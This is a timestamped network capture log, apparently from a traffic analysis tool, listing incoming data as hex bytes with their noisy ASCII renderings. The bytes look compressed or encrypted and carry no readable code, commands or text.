                                                                                                                                                                                2021-10-19 05:23:31 UTC80INData Raw: e6 90 0b 8a 6c f0 e3 a8 d1 5d e9 70 58 24 49 10 99 03 f5 02 4f b9 32 0e 2e 8e 62 2f d6 9c 21 34 b2 1e 1f 94 6c a4 5b f7 99 8b d2 39 27 77 e4 d0 af 98 83 e9 2c 95 1b 7a 43 94 41 42 ff 31 f3 09 84 08 9d c2 b5 ac a5 57 09 60 d0 f9 38 be c2 11 b9 bb 14 e1 02 cd 83 44 3a 5a f9 5f a7 03 dd f1 d0 f5 8d 0b c6 bc a4 ff 94 29 a0 8d c2 58 3c 31 a6 50 d9 44 d3 c5 ba 3f a2 3e 36 2c d6 05 87 c6 1f b6 a7 2c e0 76 28 7e 39 26 87 b2 08 12 8e fd a1 98 af 04 de 05 47 fa 7d 77 e6 2e 5c b3 15 2c a5 20 29 e1 ad e1 d7 60 85 5a d6 4c 97 29 76 57 f5 9f 0b d0 30 bb 9a 0e b5 5c 8b a7 cd 76 3f af 4c 6f f1 e2 61 ad 1b 22 b5 c8 30 6b 80 22 5e 03 b6 aa 6b a7 08 61 55 f3 b1 f2 d1 e5 ea 78 c0 3b c5 cf ea 0c 7b de 99 55 f5 7c 49 98 95 db db c7 52 fb e6 d7 e8 30 8c 68 f1 fe 52 ad dc 80 8f
                                                                                                                                                                                Data Ascii: l]pX$IO2.b/!4l[9'w,zCAB1W`8D:Z_)X<1PD?>6,,v(~9&G}w.\, )`ZL)vW0\v?Loa"0k"^kaUx;{U|IR0hR
                                                                                                                                                                                2021-10-19 05:23:31 UTC84INData Raw: 18 a9 ac 04 43 0c d9 25 99 05 33 6b 63 5d c6 b1 8e 8d 0d da b0 b0 12 03 44 63 19 54 4f fb 8f b4 9b 90 99 23 dc ec f4 61 23 9e b0 24 33 99 d2 a9 b7 cc 73 71 31 9f d7 fd 10 3b c5 ec 01 1e 59 7d 49 0b ac 66 d4 6b c2 b1 a0 44 e4 e1 1f c1 02 e5 95 11 5c 6b d2 b0 1b 05 30 07 24 41 5f f9 5b 05 5e b2 76 21 f8 8b a7 d6 25 14 19 ae 2b 65 6f 4b bc e7 54 ed 40 d2 76 22 a5 ee 24 47 03 67 57 31 b9 be d8 86 23 99 96 e5 cf 6e 90 6a f8 6d a6 4a 98 4c 0b 15 06 04 d1 cc 8e 21 fb 0b 94 3b d1 ce 7d 03 d0 03 f7 7c c7 66 de e0 9f 01 d3 5a 11 9f 23 24 ea 7a 54 19 39 a0 59 34 ae 6d d7 b7 0c 24 00 5a b9 74 1f c3 6e e6 3a 07 5a 7b 7c 3f a0 99 da da 2c 22 25 5a d5 44 f8 60 c6 87 f1 aa b9 7d 6a 73 10 88 fd d8 50 54 d1 d3 65 e7 9d df 60 47 72 9b 65 5c 31 12 c1 41 9d a0 63 c4 72 20 84
                                                                                                                                                                                Data Ascii: C%3kc]DcTO#a#$3sq1;Y}IfkD\k0$A_[^v!%+eoKT@v"$GgW1#njmJL!;}|fZ#$zT9Y4m$Ztn:Z{|?,"%ZD`}jsPTe`Gre\1Acr
                                                                                                                                                                                2021-10-19 05:23:31 UTC88INData Raw: 57 8c 9c d7 89 48 de b3 a5 71 0d 10 92 69 5b 95 d0 58 0d 06 67 27 67 ce 1a f7 7e 44 24 5c 3a c3 05 8d 0f c7 c6 a4 81 ba d8 66 19 ad 9b 46 88 d5 d6 bf 64 59 f9 c2 5a 2d 91 5c 55 2a b4 5f 25 94 8a 02 63 2c 3c 1c f4 7e c4 13 2b 58 88 14 2b 44 76 78 2a 5a 08 bc 61 9c 9b f9 1f 79 58 d0 6a 32 e0 09 20 2c 14 c7 ba 10 18 23 1c be c2 62 62 bb 6a a6 96 de 69 ba 79 85 f1 3f e9 fd b1 98 dc 24 31 36 d6 8f dc 56 ec 55 16 36 7e 8d 62 49 d9 b1 d5 06 49 b8 96 7c 9d 41 dc 1e a4 5b 75 42 70 22 37 fa bc 9b 33 fc 45 5c 30 cd 4d 3b 33 46 89 2a e3 17 bf 7d 2c c8 87 64 47 74 6c 2a 8d 7a a3 23 1d 14 1f 81 83 47 8e fa 6b 13 26 60 64 91 8e 11 a0 9f ea a6 eb d2 5a 33 dc ff cf c6 84 a1 26 47 ca 9f 64 3c 0f 2a 6a 8e ef 0b 26 b9 55 a1 66 48 67 7a 3a a6 f3 d7 cf 29 ab c7 f6 11 36 14 3d
                                                                                                                                                                                Data Ascii: WHqi[Xg'g~D$\:fFdYZ-\U*_%c,<~+X+Dvx*ZayXj2 ,#bbjiy?$16VU6~bII|A[uBp"73E\0M;3F*},dGtl*z#Gk&`dZ3&Gd<*j&UfHgz:)6=
                                                                                                                                                                                2021-10-19 05:23:31 UTC93INData Raw: ba eb 14 9f 21 92 11 21 1d 0c 32 4e 0b e9 f6 e5 c3 f2 61 3e 5d 09 bc 66 57 14 97 81 b9 e8 5f f0 c8 85 7d 59 1b 15 a0 25 da f2 cd c7 0a 7a f8 ab ad 85 7c 75 98 ce c1 ed 8f 8b 27 22 4c e2 0f 88 43 d1 5a 17 50 e4 5e 93 00 10 13 97 75 d1 3f c7 19 95 56 9c 03 cc f5 e7 c4 ac 20 da b7 7f 29 6f 25 10 2a 2d 6d a6 e0 df 29 7b 4b 19 fd d5 6f 70 3c 0d 21 4b d6 65 37 e1 b7 90 fe 8f ce 9b c5 5e 38 fb d2 91 78 de 81 af 5a b1 ee ee 0d e5 02 1a b3 85 0d 95 bf 08 06 da 19 27 4c 7c c8 a4 2f 94 3c 23 78 f7 18 e0 31 8b 31 35 12 de 39 d0 4c 13 78 3f de bc b1 e6 e4 20 e1 13 9c 9b 7d 45 fd d2 6f 6c bd fc e6 ad 44 dd 30 3b f7 37 55 c4 1b 8c 07 c3 45 37 0b eb b3 21 64 4e c9 5f 37 7e 22 cf 58 fb 1a 73 60 8f 5f 99 91 ad 0d 93 5d 10 d0 9d ea a3 01 65 5f c9 46 eb 09 67 82 15 34 f9 76
                                                                                                                                                                                Data Ascii: !!2Na>]fW_}Y%z|u'"LCZP^u?V )o%*-m){Kop<!Ke7^8xZ'L|/<#x1159Lx? }EolD0;7UE7!dN_7~"Xs`_]e_Fg4v
                                                                                                                                                                                2021-10-19 05:23:31 UTC97INData Raw: d1 51 76 d8 61 59 67 8f 3c 22 71 ab 80 8e 5e 0b 43 14 81 7c 50 61 b9 68 e7 90 3d 0c 00 5c 34 31 00 e8 16 48 e5 20 9b cf a4 97 ac e8 ef 27 e6 86 fa 1f 4b 97 06 d8 d0 3f 45 bf a7 3c df ad 8e 35 82 cb 25 c8 d2 ce 0c 4c e4 70 67 22 56 f3 9c d9 c8 6b 70 20 da 51 4e 0f 66 04 6b 89 1d 50 64 77 46 91 54 2e 0d 2a 86 82 79 50 8e 2d 3d fa fa 7e 4f a4 0f 6d 6f 24 f6 ad 10 57 85 16 e4 a3 63 28 c3 99 e8 0b 5f 45 07 04 78 78 ba 41 2d 9c b0 50 88 5f 14 d8 35 91 80 b1 4f 74 df 46 65 2a 7f 31 fa 4e 79 1b 3e cf 18 75 67 c2 3a 0b c5 a8 8f 32 e1 da 71 b7 e7 f4 5d 7c c1 2c d6 4d 83 82 d0 f0 54 dc 1e ca 0e c6 15 81 ed 6d 4f 9c 34 c4 bc 76 e2 66 30 55 d2 78 ff 76 e2 94 41 91 63 d1 3b 59 bc 7e 1d 9c 91 b0 47 13 9e 4d 72 18 d1 b6 c2 52 28 60 b0 ec 70 8d f3 c5 4a f6 b6 bf a8 26 2e
                                                                                                                                                                                Data Ascii: QvaYg<"q^C|Pah=\41H 'K?E<5%Lpg"Vkp QNfkPdwFT.*yP-=~Omo$Wc(_ExxA-P_5OtFe*1Ny>ug:2q]|,MTmO4vf0UxvAc;Y~GMrR(`pJ&.
                                                                                                                                                                                2021-10-19 05:23:31 UTC101INData Raw: a2 1b f5 99 73 2a bc 5c aa 80 0f 04 2e 23 b8 59 fc 1b 14 96 d0 b1 52 b6 c1 fd 6f e3 9f 4c 96 5d f9 d6 21 88 fd da 14 17 ec 42 6f 52 77 ea b0 df a4 b8 2c ba 1f 06 b7 ec a4 57 e3 4c c5 58 5b 7c ea 9a 8f 37 bf 5e 3c 96 af b0 1f a6 cb 12 3c f5 77 d1 61 1c 78 21 bc c0 45 a6 45 e9 58 ae fa 36 21 c5 e8 86 a8 06 fd bd 8e e5 56 e8 cf 8f af 6b 9c bc 3f a6 8e fc 83 6f 06 d4 83 ae c0 40 7d 69 1f 56 9b ba 44 82 2c 20 f8 80 36 2a 73 db cd 14 43 58 05 e3 ed cc f0 77 2a a6 fa 7b 9b f0 76 df a5 31 65 6d 26 6b f6 25 f5 3f bb 0f ab d5 24 62 54 76 87 83 b4 3e 5f 56 af 9e af f9 29 81 eb cb 8d fb 09 d5 37 86 a6 d9 cd 89 ba d1 8c f7 88 b6 c8 0a cb b2 a4 40 62 d1 ac e7 31 49 60 84 b7 6f 78 68 5f 9d 3a 02 9e 5b 94 81 9b 2e c2 65 af 96 27 b3 ba 56 83 5d 7a 46 36 8e 61 66 02 e6 2e
                                                                                                                                                                                Data Ascii: s*\.#YRoL]!BoRw,WLX[|7^<<wax!EEX6!Vk?o@}iVD, 6*sCXw*{v1em&k%?$bTv>_V)7@b1I`oxh_:[.e'V]zF6af.
                                                                                                                                                                                2021-10-19 05:23:31 UTC105INData Raw: fa ab b3 82 e1 8a 4d 4d 68 2e 6f 3c b2 17 7b ad e5 51 96 31 33 4d 72 db 58 24 0b 97 27 88 e5 35 c5 9e 4b e0 79 fb 12 4d 01 66 2f 81 75 f0 13 1e f3 c7 62 ed ec ab cb 57 b7 19 55 02 8c 6b 23 b2 fa c7 ec b2 d2 d0 18 a0 82 11 3a 66 19 9e 82 ed 6c 86 3a 3b 25 1d 88 d2 40 2f 86 2f 63 2e 2f 88 8b 42 ce 6e 86 c7 8d 75 12 cb 90 c2 99 9d 5f f7 7c 56 a2 58 91 77 ae 72 21 cc 11 c2 90 54 c5 16 08 90 b3 18 12 1f 36 ee c4 b6 4a 86 7c bc 39 16 4f ef 59 b7 4c 3b 02 2c ef 31 29 d4 9a 3f 4f 81 bb ec 15 5d 57 b3 6b 78 b3 99 f5 0f 1d 6e 80 7d 27 63 1e 2d 1e bc 6c 78 93 0f 97 bc 18 3d d8 d3 3c 1e 79 22 1d 66 ed a2 56 7e 2f 27 9f 13 ea f1 7c f6 ee 53 2f d8 f9 31 d4 52 d2 f2 89 3f ca 2c d8 4b 1a 6d 30 75 d4 fa 2f 4e f0 5f 81 a6 c6 7e 1b 29 dd 23 f7 b0 e3 51 df 0e 94 60 17 6f 8f
                                                                                                                                                                                Data Ascii: MMh.o<{Q13MrX$'5KyMf/ubWUk#:fl:;%@//c./Bnu_|VXwr!T6J|9OYL;,1)?O]Wkxn}'c-lx=<y"fV~/'|S/1R?,Km0u/N_~)#Q`o
                                                                                                                                                                                2021-10-19 05:23:31 UTC108INData Raw: d8 cd dc 7c 50 42 84 8f db c5 59 49 b6 b1 7d 97 c4 52 e6 6f 42 bc 61 41 c1 c0 30 c1 46 90 f7 58 71 16 f5 37 bf 39 de 1d 7e ef 5c f9 ef d4 3d f3 9a 72 10 06 2c 1b 8b 8c 4d 1f a3 a6 2e ba 23 20 34 8e e9 a5 32 76 e8 a4 24 32 52 4f 9d 7e 08 4c ac e0 4b 35 cb d4 7d c5 1c 18 de 6e 76 96 bb 9b 1c 8c 58 59 32 0c a3 11 97 ae c5 93 ac 6c 04 1e 24 77 8d 74 bb 49 2a 17 d7 bb ec c0 82 4c 84 fc 0b 77 31 d7 72 80 60 2d 94 fc 45 85 dc 31 4a 69 3b f8 44 6c 3c 86 6d 5f e2 95 c1 9d ea b9 e7 cb ff 57 aa fc 37 c6 4e f4 f4 1a 16 6a 19 95 69 76 6e 20 2b 24 3c 6f 4e e1 93 16 79 74 21 e5 58 b9 d4 1b 49 89 db 70 97 74 e0 bb e2 aa 2b 80 9f 66 22 19 54 16 ca 3a 25 80 21 33 04 e1 34 3b 91 03 23 b1 17 1d 3d 7c 9d 68 2d a0 25 26 ec 2f 4c b5 63 79 56 0f 24 7d 0a 07 fa b0 23 c6 57 53 a1
                                                                                                                                                                                Data Ascii: |PBYI}RoBaA0FXq79~\=r,M.# 42v$2RO~LK5}nvXY2l$wtI*Lw1r`-E1Ji;Dl<m_W7Njivn +$<oNyt!XIpt+f"T:%!34;#=|h-%&/LcyV$}#WS
                                                                                                                                                                                2021-10-19 05:23:31 UTC112INData Raw: 73 5a 11 73 7b d3 d7 f0 3e e1 c0 8e f4 99 aa 8c 7a 00 9a a7 72 59 8f 75 6c 14 6e 71 41 29 15 8e c8 a6 71 fe 80 21 65 4e 72 2d 1b 78 3d a9 3b 5f 0b 7e 42 a7 88 63 9a 2f 74 36 18 dc ea 1e c0 02 26 8f b3 91 b0 ca 50 6c 51 b5 c2 62 fd b2 b0 3a 52 97 ae a7 16 26 e0 a3 e1 de d0 2f 34 8f d7 5e 88 af 79 0e 6c 68 55 8f 3f b5 7a 8f c8 e3 d1 09 7a 5d f9 dc 48 fb 7e ac 6c 35 25 71 a8 ff 5a b9 d3 d1 cc 1a 16 2c 50 05 83 1c b1 3f bc 01 d2 18 c1 45 8b 4e c6 5b 84 09 fd d8 76 17 7d 49 3f 1d 7f b0 c3 24 94 eb b0 24 96 11 84 c5 90 22 8f 70 96 31 37 87 66 79 4b 21 28 2e ce 99 3d de 76 53 54 32 96 34 12 42 bf 34 67 98 44 09 54 81 48 fd 7f 6c 65 19 59 31 de 87 48 8c e2 20 96 cc 71 dc 44 a6 06 e5 80 a5 36 9d e8 72 eb c5 b0 83 42 dc 6d d0 bb fd 3a 2c 8d 9f 08 5c 2a f9 c7 2b bd
                                                                                                                                                                                Data Ascii: sZs{>zrYulnqA)q!eNr-x=;_~Bc/t6&PlQb:R&/4^ylhU?zz]H~l5%qZ,P?EN[v}I?$$"p17fyK!(.=vST24B4gDTHleY1H qD6rBm:,\*+
                                                                                                                                                                                2021-10-19 05:23:31 UTC116INData Raw: 14 69 1a 8f 33 37 22 23 32 81 3d 5a 86 24 3f cb 09 8b ed 34 57 37 67 70 19 81 24 80 c7 48 af 65 13 87 65 c1 bf ee 02 1f 59 f6 14 7d 2d 56 5e 6f 4b 77 61 2d ce 83 c5 3a 70 fb 2c e8 08 70 a7 fb 31 8b 9c d3 04 b5 6f 6b b2 c0 db 5c dd c0 08 ca 1b da f7 b8 64 17 08 b6 4a d1 a5 6c c3 e0 5c 72 5c fb ef e8 1f 8b c3 8a 28 2b 34 5a c6 f1 0f 5c a3 77 50 54 fb 32 a1 a4 79 47 53 4c 5c 3f c9 62 fa e7 1d 88 0d e6 8d b3 db 01 ef 41 fe 67 8e ee 2b a3 88 98 fe 12 0e 4c 8c 64 21 08 f8 f8 5c b6 93 46 a8 09 60 ce 79 e6 bb 63 fa 6c 19 7d d1 96 04 31 aa 69 e4 7f 1a d3 da 4e d9 5d d4 86 5e 55 10 02 1d a0 82 b0 e0 6a 96 10 4d f8 85 94 6f 54 1b ba 77 89 35 99 99 e5 89 18 73 a0 83 17 c9 8b fa 1b 21 12 e3 0c d2 7c 60 a3 3e c5 b4 28 22 e8 98 ea 1f e7 e3 86 00 9d 8b b3 11 78 b9 41 af
                                                                                                                                                                                Data Ascii: i37"#2=Z$?4W7gp$HeeY}-V^oKwa-:p,p1ok\dJl\r\(+4Z\wPT2yGSL\?bAg+Ld!\F`ycl}1iN]^UjMoTw5s!|`>("xA
                                                                                                                                                                                2021-10-19 05:23:31 UTC120INData Raw: ab 65 6c ac 02 18 e5 30 df 5b 7e 37 2a 27 86 a5 fa 1d ee 8b b2 fd db 44 4a 6b 59 08 91 79 72 5c 71 62 c7 dc 47 98 42 15 6b 7d 8d e3 3a 00 b5 15 81 b2 db 46 02 7a 6a 17 f4 99 d1 d5 d3 22 f8 27 40 34 71 6c 8e 96 0d 80 82 22 6c 72 30 60 94 b3 57 51 84 c6 1f 1d 05 86 44 1f 66 de 6b a4 94 53 76 34 87 a1 1f 2f ed 56 d5 21 86 a6 9f e5 c1 f2 30 91 14 c7 cc 40 de fd 05 02 a1 02 80 8d bb 5e 43 71 29 02 f9 7a cc e4 22 57 71 df a0 05 53 ac ea 2c 98 a6 54 12 43 42 df 9c 2d 7a 5a 83 82 c7 e6 0b 53 a9 7c e9 69 a4 a7 b8 27 8f 8f 80 19 93 67 72 5d 7f 5f af 80 2c 28 f9 28 65 da 73 f4 ee 8c 48 6e 26 ce 2e ec c8 d9 2c 15 2a 72 a9 1a 54 8c 48 3c b5 12 72 3a 7c 0c 00 80 66 7f 1d ea ad 30 47 86 84 d0 b0 33 92 57 d7 b5 93 b3 8d 88 10 08 da 52 8e 5f b1 f0 69 eb 8d ee 7f ea ec d8
                                                                                                                                                                                Data Ascii: el0[~7*'DJkYyr\qbGBk}:Fzj"'@4ql"lr0`WQDfkSv4/V!0@^Cq)z"WqS,TCB-zZS|i'gr]_,((esHn&.,*rTH<r:|f0G3WR_i
                                                                                                                                                                                2021-10-19 05:23:31 UTC125INData Raw: 3c 44 b2 62 90 a0 82 ee c0 39 14 5f 8b 90 4c 14 bb 83 c2 55 85 4b 75 9c 63 db 44 c9 93 75 48 68 c9 e7 a8 63 fc 6f 24 37 27 d2 c0 d9 cc 05 8e f2 11 58 5a 76 43 fd 22 6d a1 4e d0 e4 76 19 7c 81 c1 13 1c 26 8b 54 b8 89 de d7 a9 82 32 79 62 af 1c 5d ab a2 f1 2b 5a 60 39 f3 67 86 c2 60 d8 8c 8f 61 4c 56 36 60 2d 5b 30 cb 8f aa 54 59 33 fc 2a 21 56 f8 19 f2 f3 8e 69 65 6c 01 3d c4 4a 68 60 25 67 25 24 56 39 fe 1f dd 1a d7 3c 1b c9 ea b7 6d a3 6c 44 5c bf 28 1f 3c 34 87 0a ed 29 06 3a 1a 0a fe 75 67 fb f2 02 92 79 a8 04 2d 19 77 95 6d 4c 1a 0d fa 50 48 39 47 61 67 51 41 d9 4f 2f 5c f0 57 6f d5 04 07 bc 24 81 e2 d1 b1 d0 12 f0 2f aa 4b 02 75 42 37 25 90 a1 cb 94 15 30 d2 c4 3c 1b 3f 54 fd 6f ce 74 e4 70 48 22 35 26 27 51 99 08 90 39 60 4c 6d 31 a7 5a 6b 98 e5 ea
                                                                                                                                                                                Data Ascii: <Db9_LUKucDuHhco$7'XZvC"mNv|&T2yb]+Z`9g`aLV6`-[0TY3*!Viel=Jh`%g%$V9<mlD\(<4):ugy-wmLPH9GagQAO/\Wo$/KuB7%0<?TotpH"5&'Q9`Lm1Zk
                                                                                                                                                                                2021-10-19 05:23:31 UTC129INData Raw: 65 bc df 29 93 33 bd dd d9 6f 00 5b 17 cd f5 f0 60 a8 b9 d7 f9 06 8c 35 da 48 69 76 a6 f9 5d 13 1b 31 6e 2f 2e a4 e2 9b 50 0f 59 1d 88 7d e6 3c 7c 97 54 04 ae f6 c7 d6 12 a2 3a a8 aa 83 59 00 1d 43 d4 f7 b0 a1 89 f9 82 cc 4e 26 6a 36 e8 e6 4d d3 1d 3a c1 f7 93 27 62 09 62 ad 19 4c 4c 50 f9 a3 7f c7 c2 ff 49 91 d9 31 02 a0 f0 ab c1 ef bc 4b 0d 93 a6 3d eb 0b 18 00 83 14 58 3c f4 8e 05 8d 6c d7 93 31 30 63 e5 af b7 a5 6e 2a ce 31 f1 70 d3 50 58 9b 72 92 9d 26 69 4c 48 d2 45 0e 6b 24 9d 19 fb 4a e8 0b 9e 7a e8 96 de a7 5d 39 09 90 35 10 1e 00 d8 91 df dc eb 95 10 b3 11 f7 85 2d 9c fe c6 1e 33 8d c6 56 04 7b 4b 6d ee 23 12 d6 dc bd a8 b5 5c ca c9 c3 ee 17 c0 63 2b fd 4c 2d cf c0 6a a7 e7 63 31 64 75 c6 89 2f 67 ef c9 0e 37 a2 e0 38 24 1d 93 78 cb da 88 c8 a9
                                                                                                                                                                                Data Ascii: e)3o[`5Hiv]1n/.PY}<|T:YCN&j6M:'bbLLPI1K=X<l10cn*1pPXr&iLHEk$Jz]95-3V{Km#\c+L-jc1du/g78$x
                                                                                                                                                                                2021-10-19 05:23:31 UTC133INData Raw: ef 3b 6b ed ea 4c 35 59 c3 e3 65 4c 02 dc 9b 36 02 b4 9a f9 7b bb 61 8c 20 aa f7 d6 2a ac 80 20 7c 6a 06 9d 98 4c 00 58 a8 b9 b8 8a b0 4b d5 8f cf 0c 0e 25 4b 18 bb 36 de ea 0c eb f5 f4 8d 4d 87 07 68 1c 79 29 56 83 d8 17 38 ea 67 16 20 61 5f 94 79 a2 ed 10 78 d6 4a ef 66 98 fb b3 09 c1 f1 de ae a6 8c 25 cd 03 f1 c0 4e 6c 5c 68 3f 24 4b f2 26 6e 92 d5 73 f2 b9 7a 2a d9 dd 5f 8a b4 ab d6 37 f0 77 82 28 d8 f2 1c 84 b3 48 01 d6 a0 09 20 39 32 46 35 a8 19 de 70 7a 7f ea 0f b0 7a 1c 9e 34 9c c8 5c 39 7e 41 86 8e 18 96 b9 f1 fa 6d c4 a8 48 dc 34 5f 68 de b4 2a a7 49 65 30 1e e3 b5 9e c2 25 5c 0b e7 fe c4 b8 58 f7 eb 17 f8 7e 24 be e8 92 7a 57 6b 1a a8 31 94 00 0f 36 fd b3 1f 98 c1 ad c6 ce 2f e7 e6 c1 7b 84 6c a0 07 e9 84 09 c9 dc 03 e0 2b 23 ec 9b 4f b3 17 9f
                                                                                                                                                                                Data Ascii: ;kL5YeL6{a * |jLXK%K6Mhy)V8g a_yxJf%Nl\h?$K&nsz*_7w(H 92F5pzz4\9~AmH4_h*Ie0%\X~$zWk16/{l+#O
                                                                                                                                                                                2021-10-19 05:23:31 UTC137INData Raw: 82 9b 22 6b 60 21 a9 d3 a8 14 65 f9 63 0b 10 b5 81 ca 82 63 93 88 85 aa 6a 36 95 c1 2d 4e 6e e0 b0 e8 7c a1 9a 50 f9 8e ea 21 b2 30 e1 2e 28 f8 a2 29 3f 4c a8 eb 86 fb 73 f5 0e 08 5b 9b e1 91 77 a0 52 4c 06 de 93 2e 24 3a f3 4b 42 c6 2d 82 1f 41 ad 21 70 30 19 5f 5c f3 08 0d 3f ba 91 4d 15 da ea 4b 56 f0 51 b8 08 eb af eb 66 ee b1 a1 64 eb 3a 3b 90 7c 1f 74 e5 3a e9 d7 67 31 86 75 eb 79 5c 15 d0 4a 05 ec 99 bb b7 44 f6 8a 90 67 32 0a 51 94 f4 10 96 77 9f 73 fe cd 16 8d 21 11 5e 9a 6d 67 ef 8e 1d 56 0d 3e 8e ce cb c1 99 b5 de 2e ae c5 cc 36 fa 28 6b 01 a0 20 12 26 92 17 93 a6 96 43 dd 23 2d 13 cf 0c bd 27 82 cb ac c2 8f 4d 9d 32 92 51 3f 53 93 a7 52 43 24 37 47 d0 8c 31 1a bb 05 bd 96 28 c2 d0 30 df 02 35 0d ae 1c ea a4 dc 5a 21 99 58 62 cd 49 87 7c 80 4a
                                                                                                                                                                                Data Ascii: "k`!eccj6-Nn|P!0.()?Ls[wRL.$:KB-A!p0_\?MKVQfd:;|t:g1uy\JDg2Qws!^mgV>.6(k &C#-'M2Q?SRC$7G1(05Z!XbI|J
                                                                                                                                                                                2021-10-19 05:23:31 UTC140INData Raw: 51 02 26 23 32 e6 31 d5 90 6d de 64 a4 10 cd 0a 66 57 99 f1 d1 d1 dc 0d 8b 20 60 18 c7 c8 21 22 09 7b 1c b0 e2 0f 2b 74 6f 92 23 3d af 2b 56 4d dd 09 d1 dc b7 4d a1 f8 de d2 58 2d 94 e6 5e 16 cf d7 cd 38 e9 e8 81 9a 07 15 c0 77 64 82 42 a8 9c 74 b6 67 f1 44 7b db c3 65 b6 52 d0 59 ba f4 e0 37 f6 c8 fb b5 81 1a f2 da f7 b9 ef bf 5d eb 04 6c 2a fe a2 f7 c9 79 0c 18 47 66 c4 d3 da b8 fa c5 93 00 59 66 26 fe 14 d6 e6 de e1 d2 d6 75 2d 9e 33 18 2e 29 5e 58 19 70 cd 41 47 04 af 56 0b d7 79 e2 08 76 75 95 91 ee 15 5f 73 4b f5 64 18 6b 11 39 a6 5f e5 9d 94 3a 4d 82 85 e1 5f 58 dc f1 c0 74 57 39 93 75 8d f9 5b 76 24 a2 e0 b1 88 6a 8e 25 f8 8b 1d c4 6b 6e 83 e1 1d e8 f5 cd 44 03 41 44 fb c2 23 4b 35 86 aa 2a ed 1e fb e4 b0 38 00 0f a2 c2 03 9e ec 23 7c 02 3e 4f 42
                                                                                                                                                                                Data Ascii: Q&#21mdfW `!"{+to#=+VMMX-^8wdBtgD{eRY7]l*yGfYf&u-3.)^XpAGVyvu_sKdk9_:M_XtW9u[v$j%knDAD#K5*8#|>OB
                                                                                                                                                                                2021-10-19 05:23:31 UTC144INData Raw: 6f 49 bb 57 29 2d 5e 2f 2c 63 14 6d 64 b5 3a 67 cf c4 c4 ac c9 36 06 ae ba 3b 04 5e 4c 55 2f 30 94 22 2c 1a 07 5c 58 41 f1 5b 6d a1 69 9d cb af e9 2f 7e 1d 98 56 c6 f0 f9 3b d1 1f ad 14 4a 3c 2b 59 c5 9f f8 9d b9 71 ae 9e da 82 21 e8 36 a4 a2 c0 16 e4 68 de 4c 09 6b 78 53 f5 ca 75 eb 5a 3c d6 21 f2 80 06 44 cc 1f 72 41 6b 28 4f d5 37 87 98 5e 4f 31 e4 c2 37 d5 0f ca 8e 0c fa 5e 26 e1 2b 5e f5 7a 70 ba f3 7c f2 6d 21 6a 22 30 e8 ca 4b b1 92 25 16 73 e2 da cb ca 3b b4 55 1a 6f 68 1b e7 71 83 f0 92 01 8e 41 b2 c2 bb 5b 4a 00 a4 6b ba 67 6d 08 48 6a 7d 57 72 7c e4 88 67 59 7e 20 6d 0c 56 bf ab 03 6d a1 27 a3 38 0a 45 1b ed 41 d9 48 f5 e9 6d 70 6e 45 e0 a3 7d 64 3c 7c e4 20 9b a7 25 cd f0 07 30 34 24 d7 59 ae f4 cb 92 c3 9a 4c e6 8d e1 11 1c 7f 2b 6f ed 32 34
                                                                                                                                                                                Data Ascii: oIW)-^/,cmd:g6;^LU/0",\XA[mi/~V;J<+Yq!6hLkxSuZ<!DrAk(O7^O17^&+^zp|m!j"0K%s;UohqA[JkgmHj}Wr|gY~ mVm'8EAHmpnE}d<| %04$YL+o24
                                                                                                                                                                                2021-10-19 05:23:31 UTC148INData Raw: 0c d8 c7 e2 e0 a8 ba 17 4d f5 ee 75 47 41 27 23 30 42 b4 0e 34 37 cc 0b 6d 0f 26 44 e6 d6 69 4f 4b de 3b 0d 99 b7 3b 1b e5 8d b4 6d 10 5d de 7a 5a d4 06 36 43 c7 42 65 86 3a 5e ad c3 50 6a c0 ff b6 24 c2 b3 63 8f c0 a2 01 a6 42 c1 54 e1 6a c4 77 11 0b 5d 5a 1b 71 0d 6a 0c ab f4 b1 86 ff 21 5a 80 d6 b0 a6 b2 4e 32 79 9f 68 6e 0e 1d cd 5b 39 a4 ab 38 a4 2f 69 55 b3 0b 3c e9 9f 25 24 b4 a3 81 7e b7 3c b9 22 14 5f c1 69 4c dc b7 d1 5d f1 e3 a3 ce d2 22 11 26 9b 77 0b b4 3c 4d 3f 2c 5c cb bf 68 d5 0b 6c ac f2 23 69 32 1c c1 d0 5e c4 c7 11 ea db b6 f3 19 b9 bb 78 81 bb f1 66 91 16 d9 37 7e 86 0b 26 24 f3 9c 47 65 80 94 cf dc 6f fa eb 25 2c a8 26 f8 cf 82 98 bd e7 16 45 e1 64 13 48 5b 7f 56 68 5c dd 1d d7 28 85 0a 5f 5b 42 97 80 58 33 82 ca 21 55 5c 6c 8d 8e af
                                                                                                                                                                                Data Ascii: MuGA'#0B47m&DiOK;;m]zZ6CBe:^Pj$cBTjw]Zqj!ZN2yhn[98/iU<%$~<"_iL]"&w<M?,\hl#i2^xf7~&$Geo%,&EdH[Vh\(_[BX3!U\l
                                                                                                                                                                                2021-10-19 05:23:31 UTC152INData Raw: 74 c1 c7 b7 97 44 58 34 02 1e 00 67 84 0d c6 cb 62 1b d0 34 75 63 c3 51 06 bc b1 46 d1 68 0f 16 18 a3 b9 36 62 4c fc 10 1f f7 2e f8 8c 0b 83 c3 8d 46 05 80 9a 15 50 91 4e 5b 08 a6 ce 4c 5f 99 56 cc d1 c0 eb 13 d8 5e 04 24 58 d4 13 9b 67 46 1c 84 08 4c 76 53 15 ad f7 a7 aa d6 92 9c 2f 29 f6 3b 66 2f 60 4b 57 bb df 4e c3 db 37 f8 84 e2 03 60 a1 fa e2 b3 55 33 dc 8f b8 d5 c1 9a fd a2 d2 b5 97 2d 5d c8 0f c8 76 ff 44 2f 77 65 fa a4 1f 80 43 e4 8d af 3a 51 1e 41 ae 64 a5 0a 2b 21 f3 c5 63 7a b5 c7 da bc 10 24 7a 6f c7 0c 40 33 85 9f 5b b8 82 47 95 29 9d c7 3c 02 59 1b b1 c9 7c c6 87 de 6e 89 fc 3d a4 14 70 5c 52 00 ce b7 74 84 24 e6 80 a5 17 22 2e 70 0d a0 88 7f 7d 8d aa 38 88 2d 6d 44 68 1c 57 70 70 7b e0 14 c9 5f 69 f8 2d 00 1f cb 61 67 20 0e cd 85 84 cb ab
                                                                                                                                                                                Data Ascii: tDX4gb4ucQFh6bL.FPN[L_V^$XgFLvS/);f/`KWN7`U3-]vD/weC:QAd+!cz$zo@3[G)<Y|n=p\Rt$".p}8-mDhWpp{_i-ag
